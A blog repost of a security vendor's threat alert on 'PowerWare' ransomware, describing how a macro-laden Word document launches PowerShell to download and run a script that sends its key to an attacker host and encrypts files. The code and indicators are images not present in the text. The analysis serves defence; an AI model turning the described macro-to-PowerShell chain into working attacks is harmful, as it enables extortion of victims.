Skip to content

“PowerWare,” New Ransomware Written in PowerShell, Targets Organizations via Microsoft Word

02/04/2016

https://www.carbonblack.com/2016/03/25/threat-alert-powerware-new-ransomware-written-in-powershell-targets-organizations-via-microsoft-word/

“PowerWare” is a new instance of ransomware utilizing native tools, such as PowerShell on operating systems. “Traditional” ransomware variants typically install new malicious files on the system, which, in some instances, can be easier to detect. “PowerWare” asks PowerShell, a core utility of current Windows systems, to do the dirty work. By leveraging PowerShell, this ransomware attempts to avoid writing new files to disk and tries to blend in with more legitimate computer activity.

For the “PowerWare” test sample we ran, we opened a “malicious” Word document.

PWa1

In this example, if the user enables the macros to run, cmd.exe will be spawned to launch a pair of instances of PowerShell: one that downloads the ransomware script and another that starts PowerShell with the script as input.

powerware code

The process tree is in the command line in the screenshot below:

PWa2

Below is a snippet of the “PowerWare” script. In the first few lines, it generates some random numbers to be used to compute the key for the encryption, as well as for the UUID assigned to this endpoint. Then, the URL to post the key to is defined, and this information is sent to the attacker controlled host via HTTP – in plain text.

PWa3

Next, the commands for creating the actual key to be used in the encryption, the initialization vector, and other crypto parameters are in view.

Finally, the script goes through the file system, encrypting every file with a given extension (extensions noted below).

Attackers have also included an HTML file in every folder that had a file encrypted, named FILES_ENCRYPTED-READ_ME.HTML, detailing how an affected user can get their files back.

PWa4

Indicators of Compromise

File Details

1w

Network Details

n1

 

.

One Comment
  1. Reblogged this on TheFlippinTruth.

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: